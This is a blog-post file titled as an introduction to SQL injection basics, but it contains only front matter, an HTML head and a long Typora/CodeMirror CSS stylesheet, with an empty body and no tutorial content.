---
title: Sql
date: 2019-08-07 16:51:44
---
<!doctype html>
<html lang="zh-Hans">
<head>
<meta charset='UTF-8'><meta name='viewport' content='width=device-width, initial-scale=1'>
<title>sql注入的基础</title><style type='text/css'>html {overflow-x: initial !important;}:root { --bg-color:#ffffff; --text-color:#333333; --select-text-bg-color:#B5D6FC; --select-text-font-color:auto; --monospace:"Lucida Console",Consolas,"Courier",monospace; }
html { font-size: 14px; background-color: var(--bg-color); color: var(--text-color); font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; -webkit-font-smoothing: antialiased; }
body { margin: 0px; padding: 0px; height: auto; bottom: 0px; top: 0px; left: 0px; right: 0px; font-size: 1rem; line-height: 1.42857; overflow-x: hidden; background: inherit; tab-size: 4; }
iframe { margin: auto; }
a.url { word-break: break-all; }
a:active, a:hover { outline: 0px; }
.in-text-selection, ::selection { text-shadow: none; background: var(--select-text-bg-color); color: var(--select-text-font-color); }
#write { margin: 0px auto; height: auto; width: inherit; word-break: normal; overflow-wrap: break-word; position: relative; white-space: normal; overflow-x: visible; padding-top: 40px; }
#write.first-line-indent p { text-indent: 2em; }
#write.first-line-indent li p, #write.first-line-indent p * { text-indent: 0px; }
#write.first-line-indent li { margin-left: 2em; }
.for-image #write { padding-left: 8px; padding-right: 8px; }
body.typora-export { padding-left: 30px; padding-right: 30px; }
.typora-export .footnote-line, .typora-export li, .typora-export p { white-space: pre-wrap; }
@media screen and (max-width: 500px) {
body.typora-export { padding-left: 0px; padding-right: 0px; }
#write { padding-left: 20px; padding-right: 20px; }
.CodeMirror-sizer { margin-left: 0px !important; }
.CodeMirror-gutters { display: none !important; }
}
#write li > figure:last-child { margin-bottom: 0.5rem; }
#write ol, #write ul { position: relative; }
img { max-width: 100%; vertical-align: middle; }
button, input, select, textarea { color: inherit; font: inherit; }
input[type="checkbox"], input[type="radio"] { line-height: normal; padding: 0px; }
*, ::after, ::before { box-sizing: border-box; }
#write h1, #write h2, #write h3, #write h4, #write h5, #write h6, #write p, #write pre { width: inherit; }
#write h1, #write h2, #write h3, #write h4, #write h5, #write h6, #write p { position: relative; }
p { line-height: inherit; }
h1, h2, h3, h4, h5, h6 { break-after: avoid-page; break-inside: avoid; orphans: 2; }
p { orphans: 4; }
h1 { font-size: 2rem; }
h2 { font-size: 1.8rem; }
h3 { font-size: 1.6rem; }
h4 { font-size: 1.4rem; }
h5 { font-size: 1.2rem; }
h6 { font-size: 1rem; }
.md-math-block, .md-rawblock, h1, h2, h3, h4, h5, h6, p { margin-top: 1rem; margin-bottom: 1rem; }
.hidden { display: none; }
.md-blockmeta { color: rgb(204, 204, 204); font-weight: 700; font-style: italic; }
a { cursor: pointer; }
sup.md-footnote { padding: 2px 4px; background-color: rgba(238, 238, 238, 0.7); color: rgb(85, 85, 85); border-radius: 4px; cursor: pointer; }
sup.md-footnote a, sup.md-footnote a:hover { color: inherit; text-transform: inherit; text-decoration: inherit; }
#write input[type="checkbox"] { cursor: pointer; width: inherit; height: inherit; }
figure { overflow-x: auto; margin: 1.2em 0px; max-width: calc(100% + 16px); padding: 0px; }
figure > table { margin: 0px !important; }
tr { break-inside: avoid; break-after: auto; }
thead { display: table-header-group; }
table { border-collapse: collapse; border-spacing: 0px; width: 100%; overflow: auto; break-inside: auto; text-align: left; }
table.md-table td { min-width: 32px; }
.CodeMirror-gutters { border-right: 0px; background-color: inherit; }
.CodeMirror-linenumber { user-select: none; }
.CodeMirror { text-align: left; }
.CodeMirror-placeholder { opacity: 0.3; }
.CodeMirror pre { padding: 0px 4px; }
.CodeMirror-lines { padding: 0px; }
div.hr:focus { cursor: none; }
#write pre { white-space: pre-wrap; }
#write.fences-no-line-wrapping pre { white-space: pre; }
#write pre.ty-contain-cm { white-space: normal; }
.CodeMirror-gutters { margin-right: 4px; }
.md-fences { font-size: 0.9rem; display: block; break-inside: avoid; text-align: left; overflow: visible; white-space: pre; background: inherit; position: relative !important; }
.md-diagram-panel { width: 100%; margin-top: 10px; text-align: center; padding-top: 0px; padding-bottom: 8px; overflow-x: auto; }
#write .md-fences.mock-cm { white-space: pre-wrap; }
.md-fences.md-fences-with-lineno { padding-left: 0px; }
#write.fences-no-line-wrapping .md-fences.mock-cm { white-space: pre; overflow-x: auto; }
.md-fences.mock-cm.md-fences-with-lineno { padding-left: 8px; }
.CodeMirror-line, twitterwidget { break-inside: avoid; }
.footnotes { opacity: 0.8; font-size: 0.9rem; margin-top: 1em; margin-bottom: 1em; }
.footnotes + .footnotes { margin-top: 0px; }
.md-reset { margin: 0px; padding: 0px; border: 0px; outline: 0px; vertical-align: top; background: 0px 0px; text-decoration: none; text-shadow: none; float: none; position: static; width: auto; height: auto; white-space: nowrap; cursor: inherit; -webkit-tap-highlight-color: transparent; line-height: normal; font-weight: 400; text-align: left; box-sizing: content-box; direction: ltr; }
li div { padding-top: 0px; }
blockquote { margin: 1rem 0px; }
li .mathjax-block, li p { margin: 0.5rem 0px; }
li { margin: 0px; position: relative; }
blockquote > :last-child { margin-bottom: 0px; }
blockquote > :first-child, li > :first-child { margin-top: 0px; }
.footnotes-area { color: rgb(136, 136, 136); margin-top: 0.714rem; padding-bottom: 0.143rem; white-space: normal; }
#write .footnote-line { white-space: pre-wrap; }
@media print {
body, html { border: 1px solid transparent; height: 99%; break-after: avoid; break-before: avoid; }
#write { margin-top: 0px; padding-top: 0px; border-color: transparent !important; }
.typora-export * { -webkit-print-color-adjust: exact; }
html.blink-to-pdf { font-size: 13px; }
.typora-export #write { padding-left: 32px; padding-right: 32px; padding-bottom: 0px; break-after: avoid; }
.typora-export #write::after { height: 0px; }
}
.footnote-line { margin-top: 0.714em; font-size: 0.7em; }
a img, img a { cursor: pointer; }
pre.md-meta-block { font-size: 0.8rem; min-height: 0.8rem; white-space: pre-wrap; background: rgb(204, 204, 204); display: block; overflow-x: hidden; }
p > .md-image:only-child:not(.md-img-error) img, p > img:only-child { display: block; margin: auto; }
p > .md-image:only-child { display: inline-block; width: 100%; }
#write .MathJax_Display { margin: 0.8em 0px 0px; }
.md-math-block { width: 100%; }
.md-math-block:not(:empty)::after { display: none; }
[contenteditable="true"]:active, [contenteditable="true"]:focus { outline: 0px; box-shadow: none; }
.md-task-list-item { position: relative; list-style-type: none; }
.task-list-item.md-task-list-item { padding-left: 0px; }
.md-task-list-item > input { position: absolute; top: 0px; left: 0px; margin-left: -1.2em; margin-top: calc(1em - 10px); border: none; }
.math { font-size: 1rem; }
.md-toc { min-height: 3.58rem; position: relative; font-size: 0.9rem; border-radius: 10px; }
.md-toc-content { position: relative; margin-left: 0px; }
.md-toc-content::after, .md-toc::after { display: none; }
.md-toc-item { display: block; color: rgb(65, 131, 196); }
.md-toc-item a { text-decoration: none; }
.md-toc-inner:hover { text-decoration: underline; }
.md-toc-inner { display: inline-block; cursor: pointer; }
.md-toc-h1 .md-toc-inner { margin-left: 0px; font-weight: 700; }
.md-toc-h2 .md-toc-inner { margin-left: 2em; }
.md-toc-h3 .md-toc-inner { margin-left: 4em; }
.md-toc-h4 .md-toc-inner { margin-left: 6em; }
.md-toc-h5 .md-toc-inner { margin-left: 8em; }
.md-toc-h6 .md-toc-inner { margin-left: 10em; }
@media screen and (max-width: 48em) {
.md-toc-h3 .md-toc-inner { margin-left: 3.5em; }
.md-toc-h4 .md-toc-inner { margin-left: 5em; }
.md-toc-h5 .md-toc-inner { margin-left: 6.5em; }
.md-toc-h6 .md-toc-inner { margin-left: 8em; }
}
a.md-toc-inner { font-size: inherit; font-style: inherit; font-weight: inherit; line-height: inherit; }
.footnote-line a:not(.reversefootnote) { color: inherit; }
.md-attr { display: none; }
.md-fn-count::after { content: "."; }
code, pre, samp, tt { font-family: var(--monospace); }
kbd { margin: 0px 0.1em; padding: 0.1em 0.6em; font-size: 0.8em; color: rgb(36, 39, 41); background: rgb(255, 255, 255); border: 1px solid rgb(173, 179, 185); border-radius: 3px; box-shadow: rgba(12, 13, 14, 0.2) 0px 1px 0px, rgb(255, 255, 255) 0px 0px 0px 2px inset; white-space: nowrap; vertical-align: middle; }
.md-comment { color: rgb(162, 127, 3); opacity: 0.8; font-family: var(--monospace); }
code { text-align: left; vertical-align: initial; }
a.md-print-anchor { white-space: pre !important; border-width: initial !important; border-style: none !important; border-color: initial !important; display: inline-block !important; position: absolute !important; width: 1px !important; right: 0px !important; outline: 0px !important; background: 0px 0px !important; text-decoration: initial !important; text-shadow: initial !important; }
.md-inline-math .MathJax_SVG .noError { display: none !important; }
.html-for-mac .inline-math-svg .MathJax_SVG { vertical-align: 0.2px; }
.md-math-block .MathJax_SVG_Display { text-align: center; margin: 0px; position: relative; text-indent: 0px; max-width: none; max-height: none; min-height: 0px; min-width: 100%; width: auto; overflow-y: hidden; display: block !important; }
.MathJax_SVG_Display, .md-inline-math .MathJax_SVG_Display { width: auto; margin: inherit; display: inline-block !important; }
.MathJax_SVG .MJX-monospace { font-family: var(--monospace); }
.MathJax_SVG .MJX-sans-serif { font-family: sans-serif; }
.MathJax_SVG { display: inline; font-style: normal; font-weight: 400; line-height: normal; zoom: 90%; text-indent: 0px; text-align: left; text-transform: none; letter-spacing: normal; word-spacing: normal; overflow-wrap: normal; white-space: nowrap; float: none; direction: ltr; max-width: none; max-height: none; min-width: 0px; min-height: 0px; border: 0px; padding: 0px; margin: 0px; }
.MathJax_SVG * { transition: none 0s ease 0s; }
.MathJax_SVG_Display svg { vertical-align: middle !important; margin-bottom: 0px !important; margin-top: 0px !important; }
.os-windows.monocolor-emoji .md-emoji { font-family: "Segoe UI Symbol", sans-serif; }
.md-diagram-panel > svg { max-width: 100%; }
[lang="mermaid"] svg, [lang="flow"] svg { max-width: 100%; height: auto; }
[lang="mermaid"] .node text { font-size: 1rem; }
table tr th { border-bottom: 0px; }
video { max-width: 100%; display: block; margin: 0px auto; }
iframe { max-width: 100%; width: 100%; border: none; }
.highlight td, .highlight tr { border: 0px; }
.CodeMirror { height: auto; }
.CodeMirror.cm-s-inner { background: inherit; }
.CodeMirror-scroll { overflow: auto hidden; z-index: 3; }
.CodeMirror-gutter-filler, .CodeMirror-scrollbar-filler { background-color: rgb(255, 255, 255); }
.CodeMirror-gutters { border-right: 1px solid rgb(221, 221, 221); background: inherit; white-space: nowrap; }
.CodeMirror-linenumber { padding: 0px 3px 0px 5px; text-align: right; color: rgb(153, 153, 153); }
.cm-s-inner .cm-keyword { color: rgb(119, 0, 136); }
.cm-s-inner .cm-atom, .cm-s-inner.cm-atom { color: rgb(34, 17, 153); }
.cm-s-inner .cm-number { color: rgb(17, 102, 68); }
.cm-s-inner .cm-def { color: rgb(0, 0, 255); }
.cm-s-inner .cm-variable { color: rgb(0, 0, 0); }
.cm-s-inner .cm-variable-2 { color: rgb(0, 85, 170); }
.cm-s-inner .cm-variable-3 { color: rgb(0, 136, 85); }
.cm-s-inner .cm-string { color: rgb(170, 17, 17); }
.cm-s-inner .cm-property { color: rgb(0, 0, 0); }
.cm-s-inner .cm-operator { color: rgb(152, 26, 26); }
.cm-s-inner .cm-comment, .cm-s-inner.cm-comment { color: rgb(170, 85, 0); }
.cm-s-inner .cm-string-2 { color: rgb(255, 85, 0); }
.cm-s-inner .cm-meta { color: rgb(85, 85, 85); }
.cm-s-inner .cm-qualifier { color: rgb(85, 85, 85); }
.cm-s-inner .cm-builtin { color: rgb(51, 0, 170); }
.cm-s-inner .cm-bracket { color: rgb(153, 153, 119); }
.cm-s-inner .cm-tag { color: rgb(17, 119, 0); }
.cm-s-inner .cm-attribute { color: rgb(0, 0, 204); }
.cm-s-inner .cm-header, .cm-s-inner.cm-header { color: rgb(0, 0, 255); }
.cm-s-inner .cm-quote, .cm-s-inner.cm-quote { color: rgb(0, 153, 0); }
.cm-s-inner .cm-hr, .cm-s-inner.cm-hr { color: rgb(153, 153, 153); }
.cm-s-inner .cm-link, .cm-s-inner.cm-link { color: rgb(0, 0, 204); }
.cm-negative { color: rgb(221, 68, 68); }
.cm-positive { color: rgb(34, 153, 34); }
.cm-header, .cm-strong { font-weight: 700; }
.cm-del { text-decoration: line-through; }
.cm-em { font-style: italic; }
.cm-link { text-decoration: underline; }
.cm-error { color: red; }
.cm-invalidchar { color: red; }
.cm-constant { color: rgb(38, 139, 210); }
.cm-defined { color: rgb(181, 137, 0); }
div.CodeMirror span.CodeMirror-matchingbracket { color: rgb(0, 255, 0); }
div.CodeMirror span.CodeMirror-nonmatchingbracket { color: rgb(255, 34, 34); }
.cm-s-inner .CodeMirror-activeline-background { background: inherit; }
.CodeMirror { position: relative; overflow: hidden; }
.CodeMirror-scroll { height: 100%; outline: 0px; position: relative; box-sizing: content-box; background: inherit; }
.CodeMirror-sizer { position: relative; }
.CodeMirror-gutter-filler, .CodeMirror-hscrollbar, .CodeMirror-scrollbar-filler, .CodeMirror-vscrollbar { position: absolute; z-index: 6; display: none; }
.CodeMirror-vscrollbar { right: 0px; top: 0px; overflow: hidden; }
.CodeMirror-hscrollbar { bottom: 0px; left: 0px; overflow: hidden; }
.CodeMirror-scrollbar-filler { right: 0px; bottom: 0px; }
.CodeMirror-gutter-filler { left: 0px; bottom: 0px; }
.CodeMirror-gutters { position: absolute; left: 0px; top: 0px; padding-bottom: 30px; z-index: 3; }
.CodeMirror-gutter { white-space: normal; height: 100%; box-sizing: content-box; padding-bottom: 30px; margin-bottom: -32px; display: inline-block; }
.CodeMirror-gutter-wrapper { position: absolute; z-index: 4; background: 0px 0px !important; border: none !important; }
.CodeMirror-gutter-background { position: absolute; top: 0px; bottom: 0px; z-index: 4; }
.CodeMirror-gutter-elt { position: absolute; cursor: default; z-index: 4; }
.CodeMirror-lines { cursor: text; }
.CodeMirror pre { border-radius: 0px; border-width: 0px; background: 0px 0px; font-family: inherit; font-size: inherit; margin: 0px; white-space: pre; overflow-wrap: normal; color: inherit; z-index: 2; position: relative; overflow: visible; }
.CodeMirror-wrap pre { overflow-wrap: break-word; white-space: pre-wrap; word-break: normal; }
.CodeMirror-code pre { border-right: 30px solid transparent; width: fit-content; }
.CodeMirror-wrap .CodeMirror-code pre { border-right: none; width: auto; }
.CodeMirror-linebackground { position: absolute; left: 0px; right: 0px; top: 0px; bottom: 0px; z-index: 0; }
.CodeMirror-linewidget { position: relative; z-index: 2; overflow: auto; }
.CodeMirror-wrap .CodeMirror-scroll { overflow-x: hidden; }
.CodeMirror-measure { position: absolute; width: 100%; height: 0px; overflow: hidden; visibility: hidden; }
.CodeMirror-measure pre { position: static; }
.CodeMirror div.CodeMirror-cursor { position: absolute; visibility: hidden; border-right: none; width: 0px; }
.CodeMirror div.CodeMirror-cursor { visibility: hidden; }
.CodeMirror-focused div.CodeMirror-cursor { visibility: inherit; }
.cm-searching { background: rgba(255, 255, 0, 0.4); }
@media print {
.CodeMirror div.CodeMirror-cursor { visibility: hidden; }
}
.cm-s-inner .cm-variable, .cm-s-inner .cm-operator, .cm-s-inner .cm-property { color: rgb(184, 191, 198); }
.cm-s-inner .cm-keyword { color: rgb(200, 143, 208); }
.cm-s-inner .cm-tag { color: rgb(125, 244, 106); }
.cm-s-inner .cm-attribute { color: rgb(117, 117, 228); }
.CodeMirror div.CodeMirror-cursor { border-left: 1px solid rgb(184, 191, 198); z-index: 3; }
.cm-s-inner .cm-string { color: rgb(210, 107, 107); }
.cm-s-inner .cm-comment, .cm-s-inner.cm-comment { color: rgb(218, 146, 74); }
.cm-s-inner .cm-header, .cm-s-inner .cm-def, .cm-s-inner.cm-header, .cm-s-inner.cm-def { color: rgb(141, 141, 240); }
.cm-s-inner .cm-quote, .cm-s-inner.cm-quote { color: rgb(87, 172, 87); }
.cm-s-inner .cm-hr { color: rgb(216, 213, 213); }
.cm-s-inner .cm-link { color: rgb(211, 211, 239); }
.cm-s-inner .cm-negative { color: rgb(217, 80, 80); }
.cm-s-inner .cm-positive { color: rgb(80, 230, 80); }
.cm-s-inner .cm-string-2 { color: rgb(255, 85, 0); }
.cm-s-inner .cm-meta, .cm-s-inner .cm-qualifier { color: rgb(183, 179, 179); }
.cm-s-inner .cm-builtin { color: rgb(243, 179, 248); }
.cm-s-inner .cm-bracket { color: rgb(153, 153, 119); }
.cm-s-inner .cm-atom, .cm-s-inner.cm-atom { color: rgb(132, 182, 203); }
.cm-s-inner .cm-number { color: rgb(100, 171, 143); }
.cm-s-inner .cm-variable { color: rgb(184, 191, 198); }
.cm-s-inner .cm-variable-2 { color: rgb(159, 186, 213); }
.cm-s-inner .cm-variable-3 { color: rgb(28, 198, 133); }
.CodeMirror-selectedtext, .CodeMirror-selected { background: rgb(74, 137, 220); text-shadow: none; color: rgb(255, 255, 255) !important; }
.CodeMirror-gutters { border-right: none; }
:root { --bg-color: #363B40; --side-bar-bg-color: #2E3033; --text-color: #b8bfc6; --select-text-bg-color:#4a89dc; --control-text-color: #b7b7b7; --control-text-hover-color: #eee; --window-border: 1px solid #555; --active-file-bg-color: rgb(34, 34, 34); --active-file-border-color: #8d8df0; --active-file-text-color: white; --item-hover-bg-color: #70717d; --item-hover-text-color: white; --primary-color: #6dc1e7; --rawblock-edit-panel-bd: #333; }
html { font-size: 16px; }
html, body { text-size-adjust: 100%; background: var(--bg-color); fill: currentcolor; line-height: 1.625rem; }
#write { max-width: 914px; }
html, body, button, input, select, textarea, div.code-tooltip-content { color: rgb(184, 191, 198); border-color: transparent; }
div.code-tooltip, .md-hover-tip .md-arrow::after { background: rgb(51, 51, 51); }
.popover.bottom > .arrow::after { border-bottom-color: rgb(51, 51, 51); }
html, body, button, input, select, textarea { font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; }
hr { height: 2px; border: 0px; margin: 24px 0px !important; }
h1, h2, h3, h4, h5, h6 { font-family: "Lucida Grande", Corbel, sans-serif; font-weight: normal; clear: both; overflow-wrap: break-word; margin: 0px; padding: 0px; color: rgb(222, 222, 222); }
h1 { font-size: 2.5rem; line-height: 2.75rem; margin-bottom: 1.5rem; letter-spacing: -1.5px; }
h2 { font-size: 1.63rem; line-height: 1.875rem; margin-bottom: 1.5rem; letter-spacing: -1px; font-weight: bold; }
h3 { font-size: 1.17rem; line-height: 1.5rem; margin-bottom: 1.5rem; letter-spacing: -1px; font-weight: bold; }
h4 { font-size: 1.12rem; line-height: 1.375rem; margin-bottom: 1.5rem; color: white; }
h5 { font-size: 0.97rem; line-height: 1.25rem; margin-bottom: 1.5rem; font-weight: bold; }
h6 { font-size: 0.93rem; line-height: 1rem; margin-bottom: 0.75rem; color: white; }
@media (min-width: 980px) {
h3.md-focus::before, h4.md-focus::before, h5.md-focus::before, h6.md-focus::before { color: rgb(221, 221, 221); border: 1px solid rgb(221, 221, 221); border-radius: 3px; position: absolute; left: -1.64286rem; top: 0.357143rem; float: left; font-size: 9px; padding-left: 2px; padding-right: 2px; vertical-align: bottom; font-weight: normal; line-height: normal; }
h3.md-focus::before { content: "h3"; }
h4.md-focus::before { content: "h4"; }
h5.md-focus::before { content: "h5"; top: 0px; }
h6.md-focus::before { content: "h6"; top: 0px; }
}
a { text-decoration: none; outline: 0px; }
a:hover { outline: 0px; }
a:focus { outline: dotted thin; }
sup.md-footnote { background-color: rgb(85, 85, 85); color: rgb(221, 221, 221); }
p { overflow-wrap: break-word; }
p, ul, dd, ol, hr, address, pre, table, iframe, .wp-caption, .wp-audio-shortcode, .wp-video-shortcode { margin-top: 0px; margin-bottom: 1.5rem; }
li > blockquote { margin-bottom: 0px; }
audio:not([controls]) { display: none; }
[hidden] { display: none; }
.in-text-selection, ::selection { background: rgb(74, 137, 220); color: rgb(255, 255, 255); text-shadow: none; }
ul, ol { padding: 0px 0px 0px 1.875rem; }
ul { list-style: square; }
ol { list-style: decimal; }
ul ul, ol ol, ul ol, ol ul { margin: 0px; }
b, th, dt, strong { font-weight: bold; }
i, em, dfn, cite { font-style: italic; }
blockquote { margin: 35px 0px 1.875rem 1.875rem; border-left: 2px solid rgb(71, 77, 84); padding-left: 30px; }
pre, code, kbd, tt, var { background: rgba(0, 0, 0, 0.05); font-size: 0.875rem; font-family: Monaco, Consolas, "Andale Mono", "DejaVu Sans Mono", monospace; }
kbd { padding: 2px 4px; font-size: 90%; color: rgb(255, 255, 255); background-color: rgb(51, 51, 51); border-radius: 3px; box-shadow: rgba(0, 0, 0, 0.25) 0px -1px 0px inset; }
pre.md-fences { padding: 10px 10px 10px 30px; margin-bottom: 20px; background: rgb(51, 51, 51); }
.CodeMirror-gutters { background: rgb(51, 51, 51); border-right: 1px solid transparent; }
.enable-diagrams pre.md-fences[lang="sequence"] .code-tooltip, .enable-diagrams pre.md-fences[lang="flow"] .code-tooltip, .enable-diagrams pre.md-fences[lang="mermaid"] .code-tooltip { bottom: -2.2em; right: 4px; }
code, kbd, tt, var { padding: 2px 5px; }
table { max-width: 100%; width: 100%; border-collapse: collapse; border-spacing: 0px; }
th, td { padding: 5px 10px; vertical-align: top; }
a { transition: all 0.2s ease-in-out 0s; }
hr { background: rgb(71, 77, 84); }
h1 { margin-top: 2em; }
a { color: rgb(224, 224, 224); text-decoration: underline; }
a:hover { color: rgb(255, 255, 255); }
.md-inline-math script { color: rgb(129, 177, 219); }
b, th, dt, strong { color: rgb(222, 222, 222); }
mark { background: rgb(211, 212, 14); }
blockquote { color: rgb(157, 162, 166); }
table a { color: rgb(222, 222, 222); }
th, td { border: 1px solid rgb(71, 77, 84); }
.task-list { padding-left: 0px; }
.md-task-list-item { padding-left: 1.25rem; }
.md-task-list-item > input { top: auto; }
.md-task-list-item > input::before { content: ""; display: inline-block; width: 0.875rem; height: 0.875rem; vertical-align: middle; text-align: center; border: 1px solid rgb(184, 191, 198); background-color: rgb(54, 59, 64); margin-top: -0.4rem; }
.md-task-list-item > input:checked::before, .md-task-list-item > input[checked]::before { content: "√"; font-size: 0.625rem; line-height: 0.625rem; color: rgb(222, 222, 222); }
.auto-suggest-container { border: 0px; background-color: rgb(82, 92, 101); }
#typora-quick-open { background-color: rgb(82, 92, 101); }
#typora-quick-open input { background-color: rgb(82, 92, 101); border-width: 0px 0px 1px; border-top-style: initial; border-right-style: initial; border-left-style: initial; border-top-color: initial; border-right-color: initial; border-left-color: initial; border-image: initial; border-bottom-style: solid; border-bottom-color: grey; }
.typora-quick-open-item { background-color: inherit; color: inherit; }
.typora-quick-open-item.active, .typora-quick-open-item:hover { background-color: rgb(77, 139, 219); color: white; }
.typora-quick-open-item:hover { background-color: rgba(77, 139, 219, 0.8); }
.typora-search-spinner > div { background-color: rgb(255, 255, 255); }
#write pre.md-meta-block { border-bottom: 1px dashed rgb(204, 204, 204); background: transparent; padding-bottom: 0.6em; line-height: 1.6em; }
.btn, .btn .btn-default { background: transparent; color: rgb(184, 191, 198); }
.ty-table-edit { border-top: 1px solid gray; background-color: rgb(54, 59, 64); }
.popover-title { background: transparent; }
.md-image > .md-meta { color: rgb(187, 187, 187); background: transparent; }
.md-expand.md-image > .md-meta { color: rgb(221, 221, 221); }
#write > h3::before, #write > h4::before, #write > h5::before, #write > h6::before { border: none; border-radius: 0px; color: rgb(136, 136, 136); text-decoration: underline; left: -1.4rem; top: 0.2rem; }
#write > h3.md-focus::before { top: 2px; }
#write > h4.md-focus::before { top: 2px; }
.md-toc-item { color: rgb(168, 194, 220); }
#write div.md-toc-tooltip { background-color: rgb(54, 59, 64); }
.dropdown-menu .btn:hover, .dropdown-menu .btn:focus, .md-toc .btn:hover, .md-toc .btn:focus { color: white; background: black; }
#toc-dropmenu { background: rgba(50, 54, 59, 0.93); border: 1px solid rgba(253, 253, 253, 0.15); }
#toc-dropmenu .divider { background-color: rgb(155, 155, 155); }
.outline-expander::before { top: 2px; }
#typora-sidebar { box-shadow: none; border-right: none; }
.sidebar-tabs { border-bottom: 0px; }
#typora-sidebar:hover .outline-title-wrapper { border-left: 1px dashed; }
.outline-title-wrapper .btn { color: inherit; }
.outline-item:hover { border-color: rgb(54, 59, 64); background-color: rgb(54, 59, 64); color: white; }
h1.md-focus .md-attr, h2.md-focus .md-attr, h3.md-focus .md-attr, h4.md-focus .md-attr, h5.md-focus .md-attr, h6.md-focus .md-attr, .md-header-span .md-attr { color: rgb(140, 142, 146); display: inline; }
.md-comment { color: rgb(90, 149, 227); opacity: 1; }
.md-inline-math g, .md-inline-math svg { stroke: rgb(184, 191, 198) !important; fill: rgb(184, 191, 198) !important; }
[md-inline="inline_math"] { color: rgb(156, 178, 233); }
#math-inline-preview .md-arrow::after { background: black; }
.modal-content { background: var(--bg-color); border: 0px; }
.modal-title { font-size: 1.5em; }
.modal-content input { background-color: rgba(26, 21, 21, 0.51); color: white; }
.modal-content .input-group-addon { background-color: rgba(0, 0, 0, 0.17); color: white; }
.modal-backdrop { background-color: rgba(174, 174, 174, 0.7); }
.modal-content .btn-primary { border-color: var(--primary-color); }
.md-table-resize-popover { background-color: rgb(51, 51, 51); }
.form-inline .input-group .input-group-addon { color: white; }
#md-searchpanel { border-bottom: 1px dashed grey; }
.context-menu, #spell-check-panel, #footer-word-count-info { background-color: rgb(66, 70, 74); }
.context-menu.dropdown-menu .divider, .dropdown-menu .divider { background-color: rgb(119, 119, 119); }
footer { color: inherit; }
@media (max-width: 1000px) {
footer { border-top: none; }
footer:hover { color: inherit; }
}
#file-info-file-path .file-info-field-value:hover { background-color: rgb(85, 85, 85); color: rgb(222, 222, 222); }
.megamenu-content, .megamenu-opened header { background: var(--bg-color); }
.megamenu-menu-panel h2, .megamenu-menu-panel h1, .long-btn { color: inherit; }
.megamenu-menu-panel input[type="text"] { background: inherit; border-width: 0px 0px 1px; border-top-style: initial; border-right-style: initial; border-left-style: initial; border-color: initial; border-image: initial; border-bottom-style: solid; }
#recent-file-panel-action-btn { background: inherit; border: 1px solid grey; }
.megamenu-menu-panel .dropdown-menu > li > a { color: inherit; background-color: rgb(47, 53, 58); text-decoration: none; }
.megamenu-menu-panel table td:nth-child(1) { color: inherit; font-weight: bold; }
.megamenu-menu-panel tbody tr:hover td:nth-child(1) { color: white; }
.modal-footer .btn-default, .modal-footer .btn-primary, .modal-footer .btn-default:not(:hover) { border: 1px solid transparent; }
.btn-default:hover, .btn-default:focus, .btn-default.focus, .btn-default:active, .btn-default.active, .open > .dropdown-toggle.btn-default { color: white; border: 1px solid rgb(221, 221, 221); background-color: inherit; }
.modal-header { border-bottom: 0px; }
.modal-footer { border-top: 0px; }
#recent-file-panel tbody tr:nth-child(2n-1) { background-color: transparent !important; }
.megamenu-menu-panel tbody tr:hover td:nth-child(2) { color: inherit; }
.megamenu-menu-panel .btn { border: 1px solid rgb(238, 238, 238); background: transparent; }
.mouse-hover .toolbar-icon.btn:hover, #w-full.mouse-hover, #w-pin.mouse-hover { background-color: inherit; }
.typora-node::-webkit-scrollbar { width: 5px; }
.typora-node::-webkit-scrollbar-thumb:vertical { background: rgba(250, 250, 250, 0.3); }
.typora-node::-webkit-scrollbar-thumb:vertical:active { background: rgba(250, 250, 250, 0.5); }
#w-unpin { background-color: rgb(65, 130, 196); }
#top-titlebar, #top-titlebar * { color: var(--item-hover-text-color); }
.typora-sourceview-on #toggle-sourceview-btn, #footer-word-count:hover, .ty-show-word-count #footer-word-count { background: rgb(51, 51, 51); }
#toggle-sourceview-btn:hover { color: rgb(238, 238, 238); background: rgb(51, 51, 51); }
.on-focus-mode .md-end-block:not(.md-focus):not(.md-focus-container) * { color: rgb(104, 104, 104) !important; }
.on-focus-mode .md-end-block:not(.md-focus) img, .on-focus-mode .md-task-list-item:not(.md-focus-container) > input { }
.on-focus-mode li[cid]:not(.md-focus-container) { color: rgb(104, 104, 104); }
.on-focus-mode .md-fences.md-focus .CodeMirror-code > :not(.CodeMirror-activeline) *, .on-focus-mode .CodeMirror.cm-s-inner:not(.CodeMirror-focused) * { color: rgb(104, 104, 104) !important; }
.on-focus-mode .md-focus, .on-focus-mode .md-focus-container { color: rgb(255, 255, 255); }
.on-focus-mode #typora-source .CodeMirror-code > :not(.CodeMirror-activeline) * { color: rgb(104, 104, 104) !important; }
#write .md-focus .md-diagram-panel { border: 1px solid rgb(221, 221, 221); margin-left: -1px; width: calc(100% + 2px); }
#write .md-focus.md-fences-with-lineno .md-diagram-panel { margin-left: auto; }
.md-diagram-panel-error { color: rgb(241, 144, 142); }
.active-tab-files #info-panel-tab-file, .active-tab-files #info-panel-tab-file:hover, .active-tab-outline #info-panel-tab-outline, .active-tab-outline #info-panel-tab-outline:hover { color: rgb(238, 238, 238); }
.sidebar-footer-item:hover, .footer-item:hover { background: inherit; color: white; }
.ty-side-sort-btn.active, .ty-side-sort-btn:hover, .selected-folder-menu-item a::after { color: white; }
#sidebar-files-menu { border: 1px solid; box-shadow: rgba(0, 0, 0, 0.79) 4px 4px 20px; background-color: var(--bg-color); }
.file-list-item { border-bottom: none; }
.file-list-item-summary { opacity: 1; }
.file-list-item.active:first-child { border-top: none; }
.file-node-background { height: 32px; }
.file-library-node.active > .file-node-content, .file-list-item.active { color: var(--active-file-text-color); }
.file-library-node.active > .file-node-background { background-color: var(--active-file-bg-color); }
.file-list-item.active { background-color: var(--active-file-bg-color); }
#ty-tooltip { background-color: black; color: rgb(238, 238, 238); }
.md-task-list-item > input { margin-left: -1.3em; margin-top: 0.3rem; -webkit-appearance: none; }
.md-mathjax-midline { background-color: rgb(87, 97, 107); border-bottom: none; }
footer.ty-footer { border-color: rgb(101, 101, 101); }
</style>
</head>
<body class='typora-export os-windows' >
